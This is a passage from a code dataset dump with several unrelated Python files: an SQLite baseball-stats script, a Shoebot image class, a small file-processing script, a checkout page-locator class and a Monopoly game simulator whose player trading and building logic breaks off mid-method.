\" ORDER BY \" + order_by\n\n\ndef create_mlb_table():\n \"\"\"\n Creates the table we need from the data. Deletes any existing version of 'playerstats' table, so use with caution.\n :return:\n \"\"\"\n conn = sqlite3.connect('mlbstats.db')\n\n c = conn.cursor()\n # c.execute(del_table('playerstats'))\n\n # create empty table with columns\n # 'list_of_stats' is a global variable from basic_tables.py\n column_names = list_of_stats[:]\n column_names.insert(0, 'team')\n column_names.insert(0, 'name')\n c.execute(create_table('playerstats', column_names))\n\n teams = store_team_names(\"TEAM2015.csv\")\n event_data = []\n for team in teams:\n event_data.append(file_to_array(\"2015eve/2015\" + team + \".csv\"))\n\n league = League()\n\n for team in teams:\n league.add_team(team)\n list_of_players = [row[0] for row in file_to_array(\"2015eve/\" + team + \"2015.ROS\")]\n roster = Roster()\n roster.add_list_of_players(list_of_players)\n league.teams[team].add_roster(roster)\n\n for team in league.teams:\n play_by_play(event_data, league.teams[team].roster)\n\n for team in league.teams.values():\n for player in team.roster.players.values():\n row = player.to_table_row()\n # count up all stats\n i = 1\n while i < len(row):\n row[i] = len(row[i])\n i += 1\n row.insert(1, team.team_name)\n c.execute(insert_data('playerstats', row))\n\n # note: table name is not case sensitive\n # c.execute('SELECT * FROM playerstats ORDER BY team')\n # for item in c:\n # print(item)\n\n conn.commit()\n\n conn.close()\n\n\ndef main():\n conn = sqlite3.connect('mlbstats.db')\n\n c = conn.cursor()\n\n c.execute(add_column('playerstats', 'AB'))\n conn.commit()\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"crud_tables.py","file_name":"crud_tables.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"249763247","text":"from shoebot.data import _copy_attrs\n\nimport array\nfrom StringIO import StringIO\nimport os.path\nfrom sys import platform\n\nimport cairo\nimport Image as PILImage\nimport gtk\n\nif platform != 'darwin':\n\timport rsvg\n\nfrom shoebot.data import Grob, ColorMixin\nfrom shoebot.util import RecordingSurface\n\nCENTER = 'center'\nCORNER = 'corner'\n\nclass Image(Grob, ColorMixin):\n _surface_cache = {} # {filename: width, height, imagesurface}\n\n def __init__(self, bot, path = None, x = 0, y = 0, width=None, height=None, alpha=1.0, data=None, pathmode=CORNER, **kwargs):\n Grob.__init__(self, bot)\n ColorMixin.__init__(self, **kwargs)\n\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.alpha = alpha\n self.path = path\n self.data = data\n self._pathmode = pathmode\n sh = sw = None # Surface Height and Width\n \n if isinstance(self.data, cairo.ImageSurface):\n sw = self.data.get_width()\n sh = self.data.get_height()\n self._imagesurface = self.data\n else:\n # checks if image data is passed in command call, in this case it wraps\n # the data in a StringIO oject in order to use it as a file\n # the data itself must contain an entire image, not just pixel data\n # it can be useful for example to retrieve images from the web without \n # writing temp files (e.g. using nodebox's web library, see example 1 of the library)\n # if no data is passed the path is used to open a local file\n if self.data is None:\n if path in self._surface_cache:\n sw, sh, imagesurface = self._surface_cache[path]\n elif os.path.splitext(path)[1].lower() == '.svg':\n handle = rsvg.Handle(path)\n sw, sh = handle.get_dimension_data()[:2]\n imagesurface = RecordingSurface(sw, sh)\n ctx = cairo.Context(imagesurface)\n handle.render_cairo(ctx)\n elif os.path.splitext(path)[1].lower() == '.png':\n imagesurface = cairo.ImageSurface.create_from_png(path)\n sw = imagesurface.get_width()\n sh = imagesurface.get_height()\n else:\n pixbuf = gtk.gdk.pixbuf_new_from_file(path)\n sw = pixbuf.get_width()\n sh = pixbuf.get_height()\n\n ''' create a new cairo surface to place the image on '''\n surface = cairo.ImageSurface(0, sw, sh)\n ''' create a context to the new surface '''\n ct = cairo.Context(surface)\n ''' create a GDK formatted Cairo context to the new Cairo native context '''\n ct2 = gtk.gdk.CairoContext(ct)\n ''' draw from the pixbuf to the new surface '''\n ct2.set_source_pixbuf(pixbuf, 0, 0)\n ct2.paint()\n ''' surface now contains the image in a Cairo surface '''\n imagesurface = ct2.get_target()\n self._surface_cache[path] = sw, sh, imagesurface\n else:\n img = PILImage.open(StringIO(self.data))\n\n if img.mode != 'RGBA':\n img = img.convert(\"RGBA\")\n \n sw, sh = img.size\n # Would be nice to not have to do some of these conversions :-\\\n bgra_data = img.tostring('raw', 'BGRA', 0, 1)\n bgra_array = array.array('B', bgra_data)\n imagesurface = cairo.ImageSurface.create_for_data(bgra_array, cairo.FORMAT_ARGB32, sw, sh, sw*4) \n\n if width is not None or height is not None:\n if width:\n wscale = float(width) / sw\n else:\n wscale = 1.0\n if height:\n hscale = float(height) / sh\n else:\n if width:\n hscale = wscale\n else: \n hscale = 1.0\n self._transform.scale(wscale, hscale)\n\n self.width = width or sw\n self.height = height or sh\n self._imagesurface = imagesurface\n\n self._deferred_render()\n\n \n def _render(self, ctx):\n if self.width and self.height:\n # Go to initial point (CORNER or CENTER):\n transform = self._call_transform_mode(self._transform)\n \n ctx.set_matrix(self._transform)\n ctx.translate(self.x, self.y)\n ctx.set_source_surface(self._imagesurface)\n ctx.paint()\n\n def draw(self):\n self._deferred_render()\n\n def _get_center(self):\n '''Returns the center point of the path, disregarding transforms.\n '''\n x = (self.x+self.width/2)\n y = (self.y+self.height/2)\n return (x,y)\n center = property(_get_center)\n\n def copy(self):\n p = self.__class__(self._bot, self.path, self.x, self.y, self.width, self.height)\n _copy_attrs(self._bot, p, self.stateAttributes)\n return p\n\n\n","sub_path":"data/codefile/shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py","file_name":"shoebot@shoebot__0171fb9__shoebot$data$img.py.source.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"591169327","text":"# inputOutput1\n\nimport math\n\n\nxyFile = open('xyData.txt','r')\n\nx_list = []\ny_list = []\n\nfor line in xyFile:\n x_list.append(float(line.split()[0]))\n y_list.append(float(line.split()[1]))\n \nxyFile.close()\nwriteFile = open('xyHypot.txt','w');\n\nfor i in range(len(x_list)):\n hypot = math.hypot(x_list[i],y_list[i])\n writeFile.write('\\t{0}\\t\\t{1}\\t\\t{2}\\n'.format(x_list[i],y_list[i],hypot))\n \nwriteFile.close()\n \n\n \n\n","sub_path":"csv_parse/inputOutput1.py","file_name":"inputOutput1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"370573415","text":"# -*- coding: utf-8 -*-\nfrom framework.ui.base_page import BasePage\n\n\nclass CheckoutPage(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n\n locators = {\n 'address': ('ID', 'iaddress'),\n 'post_code' : ('ID', 'ipostcode'),\n 'city' : ('ID', 'itown'),\n 'name' : ('ID', 'isurname'),\n 'phone_number' : ('ID', 'iphonenumber'),\n 'email' : ('ID', 'iemail'),\n 'delivery_time' : ('ID', 'ideliverytime'),\n 'amount': ('XPATH', '//*[contains(@class,\"cart-row row-sum\")][@style!=\"display:none\"]/*[contains(@class,\"cart-sum-price\")]'),\n 'payment_selector' : ('ID', 'iselectpayment'),\n 'cash_payment' : ('XPATH', '//label[text()=\"Cash payment\"]'),\n 'amount_selector': ('ID', 'ipayswith'),\n 'order_and_pay': ('XPATH', '//input[@value=\"Order and pay\"]'),\n 'order_number': ('CLASS_NAME', 'order-purchaseid'),\n 'thanks_order': ('XPATH', '//*[text()=\"Thank you for your order!\"]')\n }","sub_path":"framework/ui/checkout_page.py","file_name":"checkout_page.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"540920093","text":"# # # # # # # # # # # # # # # #\n# Monopoly Simulator #\n# Created by Mitchell Eithun #\n# July 2014 - June 2015 #\n# # # # # # # # # # # # # # # #\n\nfrom random import randint, shuffle, choice # For random game elements.\nfrom decimal import Decimal, getcontext, ROUND_HALF_UP # The Decimal module for better rounding.\n\ngetcontext().rounding = ROUND_HALF_UP # Adjust the rounding scheme.\n\n\n\n# Define the Player class.\nclass Player:\n def __init__(self,\n number,\n buying_threshold=500,\n jail_time=3,\n smart_jail_strategy=False,\n complete_monopoly=0,\n development_threshold=0,\n building_threshold=5,\n group_preferences=(),\n initial_inventory=False,\n initial_money=False,\n evolving_threshold=0,\n group_ordering=(\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\", \"Utility\", \"Railroad\"),\n group_values=None,\n property_values=[0 for i in range(40)]\n ):\n self.number = number\n self.reset_values() # Reset the player's attributes if the player is used again.\n\n # Define initial conditions.\n self.initial_inventory = initial_inventory\n self.initial_money = initial_money\n\n if initial_money:\n self.money = initial_money\n\n # Strategy parameters.\n self.group_preferences = group_preferences\n self.development_threshold = development_threshold\n self.init_jail_time = jail_time\n self.jail_time = jail_time\n self.smart_jail_strategy = smart_jail_strategy\n self.building_threshold = building_threshold\n self.complete_monopoly = complete_monopoly\n self.buying_threshold = buying_threshold\n self.evolving_threshold = evolving_threshold\n self.property_values = property_values\n\n self.group_ordering = group_ordering\n self.group_ranking = {\"Brown\": 0, \"Light Blue\": 0, \"Pink\": 0, \"Orange\": 0,\n \"Red\": 0, \"Yellow\": 0, \"Green\": 0, \"Dark Blue\": 0,\n \"Utility\": 0, \"Railroad\": 0}\n\n for index in range(len(self.group_ordering)):\n self.group_ranking[self.group_ordering[index]] = index\n\n self.group_values = group_values\n\n # Reset a player's parameters so the same player can play in a series of games.\n def reset_values(self):\n # General attributes.\n self.position = 0 # The player starts on \"Go\".\n self.money = 1500 # The player starts with $1,500.\n self.chance_card = False # The player has no \"Get Out of Jail Free\" cards.\n self.community_chest_card = False # The player has no \"Get Out of Jail Free\" cards.\n self.in_jail = False # The player is not in jail.\n self.jail_counter = 0 # The \"turns in jail\" counter.\n self.card_rent = False\n self.inventory = [] # A list of the player's properties.\n self.monopolies = [] # A list of the player's monopolies.\n self.passed_go = False # Used for a house rule.\n self.money_changes = []\n\n # For auctions\n self.mortgage_auctioned_property = False\n self.auction_bid = 0\n\n # For house rules.\n self.bid_includes_mortgages = False\n\n def add_monopoly(self, group):\n if group not in [\"Railroad\", \"Utility\"]:\n self.monopolies.append(group)\n return\n\n # Used in analysis to add railroad and utility monopolies to player's lists of monopolies\n def add_railroads_and_utilities(self):\n railroad_counter = 0\n utility_counter = 0\n for property in self.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n elif property.group == \"Utility\":\n utility_counter += 1\n\n if railroad_counter == 4:\n self.monopolies.append(\"Railroad\")\n\n if utility_counter == 2:\n self.monopolies.append(\"Utility\")\n\n # Unmortgage properties in monopolies if possible, in accordance with buying threshold.\n def unmortgage_monopolied_properties(self, game_info):\n for board_space in self.inventory:\n if board_space.mortgaged and board_space.group in self.monopolies:\n unmortgage_price = game_info.unmortgage_price(board_space)\n if self.money - unmortgage_price >= self.get_buying_threshold(game_info):\n self.money -= unmortgage_price # Pay un-mortgage price.\n board_space.mortgaged = False # Un-mortgage property.\n pass # ##print(\"player\",self.number,\"unmortgaged\",board_space.name)\n else:\n # We can't unmortgage anything else.\n return\n\n # Attempt to develop properties in monopolies.\n def buy_buildings(self, game_info):\n # # Buy buildings. # #\n if self.monopolies:\n keep_building = True # Initial condition.\n while keep_building:\n keep_building = False # Don't keep building unless something is bought.\n for board_space in self.inventory: # Cycle through player inventory.\n if board_space.group in self.monopolies: # It's in a monopoly.\n if self.even_building_test(board_space) and not board_space.mortgaged: # Building \"evenly\".\n if board_space.buildings < 5: # self.building_threshold: # Check player's building limit.\n\n # Check if there is a building available.\n building_supply = 0\n if board_space.buildings < 4: # Ready for a house.\n building_supply = game_info.houses # The number of houses available\n building = \"house\"\n elif board_space.buildings == 4: # Ready for a hotel.\n building_supply = game_info.hotels # The number of hotels available\n building = \"hotel\"\n\n '''group_building_cost = 0\n if building == \"house\":\n for prop in self.inventory:\n if prop.group != board_space.group:\n if 1 <= prop.buildings <= 4:\n if group_building_cost == 0 or prop.house_cost < group_building_cost:\n group_building_cost = prop.house_cost\n\n if group_building_cost:\n building_supply += 1'''\n\n if building_supply > 0:\n\n # Calculate current cash available.\n if self.development_threshold == 1:\n # The player will use all but $1 to buy.\n available_cash = self.money - 1\n elif self.development_threshold == 2:\n available_cash = self.find_available_mortgage_value() + self.money - 1\n else:\n available_cash = self.money - self.get_buying_threshold(game_info)\n\n # The player can afford it.\n if available_cash - board_space.house_cost >= 0:\n\n # Build!\n if building == \"house\":\n game_info.houses -= 1 # Take 1 house.\n elif building == \"hotel\":\n game_info.hotels -= 1 # Take 1 hotel.\n game_info.houses += 4 # Put back 4 houses.\n\n board_space.buildings += 1 # Add building to property.\n self.money -= board_space.house_cost # Pay building cost.\n\n if self.development_threshold != 2 and self.money < 0:\n pass # ##print(\"error 9\", self.money)\n\n # Mortgage properties to pay for building.\n if self.development_threshold == 2:\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.group not in self.monopolies and not c_property.mortgaged:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n self.money += c_property.price / 2\n property_index += 1\n\n keep_building = True # Allow the player to build again.\n game_info.first_building = True # Buildings have been built.\n\n if game_info.hotel_upgrade or game_info.building_sellback:\n # # Buy hotels if we have exhausted houses # #\n if game_info.houses == 0:\n for group in self.monopolies:\n house_disparity = 0\n properties_in_group = 0\n house_cost = 0\n houses_found = 0\n for board_space in self.inventory:\n if board_space.group == group:\n properties_in_group += 1\n house_cost = board_space.house_cost\n house_disparity += 5 - board_space.buildings\n houses_found += board_space.buildings\n\n # There are houses to build.\n if house_disparity > 0:\n # Check if there are enough hotels available.\n if game_info.hotels >= properties_in_group:\n\n # Calculate current cash available.\n if self.development_threshold == 1:\n # The player will use all but $1 to buy.\n available_cash = self.money - 1\n elif self.development_threshold == 2:\n available_cash = self.find_available_mortgage_value() + self.money - 1\n else:\n available_cash = self.money - self.get_buying_threshold(game_info)\n\n house_costs = []\n for prop in self.inventory:\n if prop.group != group:\n if prop.buildings != 5:\n for house in range(prop.buildings):\n house_costs.append(prop.house_cost)\n\n keep_going = True\n if len(house_costs) < house_disparity and game_info.building_sellback: # TODO\n keep_going = False\n\n if keep_going:\n house_costs.sort()\n total_house_costs = 0\n for i in range(house_disparity):\n total_house_costs += house_costs[i] / 2\n\n # Check if we can afford it.\n if available_cash - (house_disparity * house_cost) - total_house_costs >= 0:\n\n # Build!\n for property in self.inventory:\n if property.group == group:\n property.buildings = 5\n game_info.hotels -= 1\n game_info.houses += houses_found\n\n # Pay for it.\n self.money -= (house_cost * house_disparity) + total_house_costs\n\n if self.development_threshold != 2 and self.money < 0:\n print(\"error 9\", self.money)\n\n # Mortgage properties to pay for buildings.\n if self.development_threshold == 2:\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.group not in self.monopolies and not c_property.mortgaged:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n self.money += c_property.price / 2\n property_index += 1\n\n # # Un-mortgage singleton properties. # #\n def unmortgage_properties(self, game_info):\n for board_space in self.inventory:\n if board_space.mortgaged:\n unmortgage_price = game_info.unmortgage_price(board_space)\n if self.money - unmortgage_price >= self.get_buying_threshold(game_info):\n self.money -= unmortgage_price # Pay un-mortgage price.\n board_space.mortgaged = False # Un-mortgage property.\n pass # ##print(\"player\",self.number,\"unmortgaged\",board_space.name)\n else:\n return # Exit if the player doesn't have enough money to continue.\n\n # # Trade to form monopolies. # # TODO\n def board_order_trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n if property.group not in [\"Railroad\", \"Utility\"]:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n if property.group not in [\"Railroad\", \"Utility\"]:\n group_num = group_number[property.group]\n group_countsB[group_num] += 1\n\n # Add the counts.\n group_counts = [sum(x) for x in zip(group_countsA, group_countsB)]\n\n # Check if consecutive property groups are complete.\n for i in [0, 1, 2, 3, 4, 5, 6]:\n j = i + 1 # The \"forward\" property group.\n # Check if we have all the properties in the group.\n if group_counts[i] == properties_in_group[i] and group_counts[j] == properties_in_group[j]:\n # Check if each player can contribute.\n if group_countsA[i] > 0 and group_countsB[i] > 0:\n if group_countsA[j] > 0 and group_countsB[j] > 0:\n\n # Shuffle the names of the consecutive two groups.\n group_names = [group_name[i], group_name[j]]\n shuffle(group_names)\n\n # playerB takes properties from playerA\n for property in playerA.inventory:\n if property.group == group_names[0]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(group_names[0])\n\n # playerA takes properties from playerB\n for property in playerB.inventory:\n if property.group == group_names[1]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(group_names[1])\n\n def ranking_trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n if playerB != playerA:\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n group_num = group_number[property.group]\n group_countsB[group_num] += 1\n\n # Find all new monopoiles that could be formed by trading.\n complete_groups = []\n for index in range(len(group_countsA)):\n if properties_in_group[index] == group_countsA[index] + group_countsB[index]:\n if properties_in_group[index] != group_countsA[index]:\n if properties_in_group[index] != group_countsB[index]:\n complete_groups.append(group_name[index])\n\n # Keep going if there are potentially monopolies.\n if complete_groups:\n # Find the order that playerA would like to trade in.\n ordered_groups = []\n for group in playerA.group_ordering:\n if group in complete_groups:\n ordered_groups.append(group)\n\n # Reverse that order.\n reversed_groups = list(reversed(ordered_groups))\n\n # A list of pairs of monopolies as playerA would have it\n pairs_of_groups = []\n for i in range(len(ordered_groups)):\n if ordered_groups[i] != reversed_groups[i]:\n if group_countsA[group_number[reversed_groups[i]]] == group_countsB[\n group_number[ordered_groups[i]]]:\n pairs_of_groups.append([ordered_groups[i], reversed_groups[i]])\n\n finished_groups = []\n # print(pairs_of_groups)\n # Loop through all pairs of possible trades\n for group_pair in pairs_of_groups:\n group1 = group_pair[0]\n group2 = group_pair[1]\n\n\n # Check if a group in the pair has already been completed.\n if group1 not in finished_groups and group2 not in finished_groups:\n # See if playerA wants group1 and playerB wants group2.\n if playerA.group_ranking[group1] < playerA.group_ranking[group2]:\n if playerB.group_ranking[group2] < playerB.group_ranking[group1]:\n\n\n # playerB takes all properties from playerA in group2\n for property in list(playerA.inventory):\n if property.group == group2:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(group2)\n\n # playerA takes all properties from playerB in group1\n for property in list(playerB.inventory):\n if property.group == group1:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(group1)\n finished_groups.extend(group_pair)\n # print('traded:', group_pair)\n\n\n # Called between turns.\n def between_turns(self, game_info):\n # Un-mortgage properties in monopolies, if possible.\n self.unmortgage_monopolied_properties(game_info)\n\n # Attempt to buy buildings.\n self.buy_buildings(game_info)\n\n # Unmortgage properties.\n self.unmortgage_properties(game_info)\n\n # Old trading scheme\n if game_info.trading_enabled and not game_info.new_trading:\n self.board_order_trading(game_info)\n\n # New trading scheme\n if game_info.new_trading:\n self.ranking_trading(game_info)\n\n # Even newer trading scheme\n if game_info.complex_trading:\n self.trading(game_info)\n\n # Even newer trading scheme (2)\n if game_info.complex_trading2:\n self.trading2(game_info)\n\n # Trading with individual properties\n if game_info.property_trading:\n self.property_trading(game_info)\n\n if game_info.discrete_property_trading:\n self.discrete_property_trading(game_info)\n\n # Sophisticated trading with money.\n def trading(self, game_info):\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # Tally properties for playerA.\n playerA = self\n group_countsA = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n # Loop through player's properties.\n for property in playerA.inventory:\n group_num = group_number[property.group]\n group_countsA[group_num] += 1\n\n # Tally properties for playerB.\n for playerB in game_info.development_order:\n if playerB != playerA:\n group_countsB = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # To store property counts.\n for property in playerB.inventory:\n group_num = group_number[property.group]\n group_countsB[group_num] += 1\n\n # Find all new monopolies that could be formed by trading.\n complete_groups = []\n for index in range(len(group_countsA)):\n if properties_in_group[index] == group_countsA[index] + group_countsB[index]:\n if properties_in_group[index] != group_countsA[index]:\n if properties_in_group[index] != group_countsB[index]:\n complete_groups.append(group_name[index])\n\n # Keep going if there are potentially monopolies.\n if complete_groups:\n # Used to track which trade is the best for playerA.\n best_trade = False\n best_value = -1\n\n # Create pairs of groups.\n for group1 in complete_groups:\n for group2 in complete_groups:\n if group1 != group2:\n\n # See if playerA wants to do the deal.\n if playerA.group_values[group1] > playerA.group_values[group2]:\n\n # Find what amount of money playerB wants.\n extra_money = 0\n if playerB.group_values[group1] > playerB.group_values[group2]:\n extra_money = (playerB.group_values[group1] - playerB.group_values[\n group2]) / 2\n\n # See if playerA can afford this deal.\n if playerA.money - playerA.buying_threshold - extra_money > 0:\n\n # Find out what player A thinks of this deal.\n perceived_value = playerA.group_values[group1] - playerA.group_values[\n group2] - extra_money\n\n print({\"group1\": group1, \"group2\": group2, \"money\": extra_money,\n \"value\": perceived_value})\n\n # See if we have a better trade than we had.\n if perceived_value > best_value:\n best_trade = {\"group1\": group1, \"group2\": group2,\n \"money\": extra_money,\n \"value\": perceived_value}\n best_value = perceived_value\n elif playerA.group_values[group1] < playerA.group_values[group2]:\n pass # The other case. TODO\n\n # If there actually is a legal trade, we execute the best one.\n if best_trade:\n print(\"best\", best_trade)\n\n # playerA takes all properties from playerB in group1\n for property in playerB.inventory:\n if property.group == best_trade[\"group1\"]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(best_trade[\"group1\"])\n\n # Vice versa\n for property in playerA.inventory:\n if property.group == best_trade[\"group2\"]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(best_trade[\"group2\"])\n\n # playerA also pays playerB\n game_info.exchange_money(amount=best_trade['money'],\n giver=playerA,\n receiver=playerB,\n summary=\"Making a trade.\")\n\n # We count how many properties in each group a player has and return a list.\n def property_counts(self, player):\n # To know where to store the counts in the list.\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n\n # To store property counts.\n group_counts = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n # Loop through player's properties.\n for property in player.inventory:\n group_num = group_number[property.group]\n group_counts[group_num] += 1\n\n return group_counts\n\n # Given two lists of property counts, we find the potenial new groups.\n def joint_groups(self, counts1, counts2):\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # To store all possible new groups.\n complete_groups = []\n\n # Loop through counts.\n for index in range(len(counts1)):\n # See if there are enough properties between the players.\n if properties_in_group[index] == counts1[index] + counts2[index]:\n # See that the groups is not owned by just one player.\n if properties_in_group[index] != counts1[index] and properties_in_group[index] != counts2[index]:\n complete_groups.append(group_name[index])\n\n return complete_groups\n\n\n # Sophisticated trading with money.\n def trading2(self, game_info):\n # Tally properties for playerA.\n playerA = self\n group_countsA = self.property_counts(playerA)\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n if playerB != playerA:\n group_countsB = self.property_counts(playerB)\n\n # Find all new monopolies that could be formed by trading.\n complete_groups = self.joint_groups(group_countsA, group_countsB)\n\n # Keep going if there are potentially monopolies.\n if complete_groups:\n\n # Used to track which trade is the best for playerA.\n best_trade = False\n best_value = -1\n\n # Look at all pairs of groups. playerA wants group1 and playerB wants group2.\n for group1 in complete_groups:\n for group2 in complete_groups:\n if group1 != group2:\n\n # Find how much player B can contribute to make the deal agreable.\n money_available_for_playerB = max(\n playerB.money - playerB.get_buying_threshold(game_info), 0)\n money_playerB_could_contribute = (playerB.group_values[group2] -\n playerB.group_values[group1]) / 2\n extra_money = min(money_playerB_could_contribute, money_available_for_playerB)\n\n # Find out if player A can even afford this trade.\n if extra_money + playerA.money - playerA.get_buying_threshold(game_info) > 0:\n # Find how much benefit player A gets out of this deal.\n benefitA = playerA.group_values[group1] + 2 * extra_money - playerA.group_values[\n group2]\n if benefitA > best_value:\n best_trade = {\"group1\": group1,\n \"group2\": group2,\n \"money\": extra_money,\n \"value\": benefitA}\n\n best_value = benefitA\n\n # If there actually is a legal trade, we execute the best one.\n if best_trade:\n # playerA takes all properties from playerB in group1\n for property in playerB.inventory:\n if property.group == best_trade[\"group1\"]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(best_trade[\"group1\"])\n\n # Vice versa\n for property in playerA.inventory:\n if property.group == best_trade[\"group2\"]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(best_trade[\"group2\"])\n\n # playerA also pays playerB\n if best_trade['money'] > 0:\n game_info.exchange_money(amount=best_trade['money'],\n giver=playerB,\n receiver=playerA,\n summary=\"Making a trade.\")\n else:\n game_info.exchange_money(amount=-best_trade['money'],\n giver=playerA,\n receiver=playerB,\n summary=\"Making a trade.\")\n\n # Trading based on evaluations\n def property_trading(self, game_info):\n main_player = self\n for property in game_info.board:\n if property in main_player.inventory:\n prop_id = property.id\n best_player = game_info.players_with_best_property_values[prop_id]\n if main_player != best_player:\n money_offer = min(best_player.money - main_player.get_buying_threshold(game_info),\n best_player.property_values[prop_id])\n if money_offer > main_player.property_values[prop_id]:\n # Make the trade.\n game_info.exchange_money(amount=money_offer,\n giver=best_player,\n receiver=main_player,\n summary=\"Making a trade.\")\n best_player.inventory.append(property)\n main_player.inventory.remove(property)\n\n # Use a group ranking to trad properties.\n def discrete_property_trading(self, game_info):\n p1 = self\n\n p1_groups = []\n for property in p1.inventory:\n group = property.group\n if group not in p1.monopolies and group not in p1_groups:\n p1_groups.append(group)\n\n for p2 in game_info.development_order:\n if p2 != p1:\n p2_groups = []\n for property in p2.inventory:\n group = property.group\n if group not in p2.monopolies and group not in p2_groups:\n p2_groups.append(group)\n\n # Properties player 1 can give away.\n p1_sorted = []\n for group in p1.group_ordering:\n if group in p1_groups:\n p1_sorted.append(group)\n\n # Properties player 1 can get.\n p2_sorted = []\n for group in p1.group_ordering:\n if group in p2_groups:\n p2_sorted.append(group)\n\n reversed(p1_sorted)\n\n possible_trades = []\n for group1 in p1_sorted:\n for group2 in p2_sorted:\n if p1.group_ranking[group2] < p1.group_ranking[group1]:\n if p2.group_ranking[group1] < p2.group_ranking[group2]:\n possible_trades.append((group1, group2))\n\n for trade in possible_trades:\n group1 = trade[0]\n group2 = trade[1]\n\n while True:\n property1 = None\n property2 = None\n\n for property in p1.inventory:\n if property.group == group1:\n property1 = property\n break\n\n if not property1:\n break\n\n for property in p2.inventory:\n if property.group == group2:\n property2 = property\n break\n\n if not property2:\n break\n\n p1.inventory.append(property2)\n p2.inventory.append(property1)\n p1.inventory.remove(property1)\n p2.inventory.remove(property2)\n # print(\"trade:\",property1.name, property2.name)\n if property1 == property2:\n print(\"!!!\")\n\n if game_info.monopoly_status(current_property=property2, player=p1):\n p1.add_monopoly(property2.group)\n\n if game_info.monopoly_status(current_property=property1, player=p2):\n p2.add_monopoly(property1.group)\n\n\n # Determines how a player gets out of jail: use a GOOJF or pay $50.\n def pay_out_of_jail(self, game_info):\n if self.chance_card:\n self.chance_card = False # The player uses his Chance GOOJF card.\n game_info.chance_cards.append(1) # Add the card back into the list.\n elif self.community_chest_card:\n self.community_chest_card = False # The player uses his Community Chest GOOJF card.\n game_info.community_chest_cards.append(1) # Add the card back into the list.\n else:\n # The player pays $50 to get 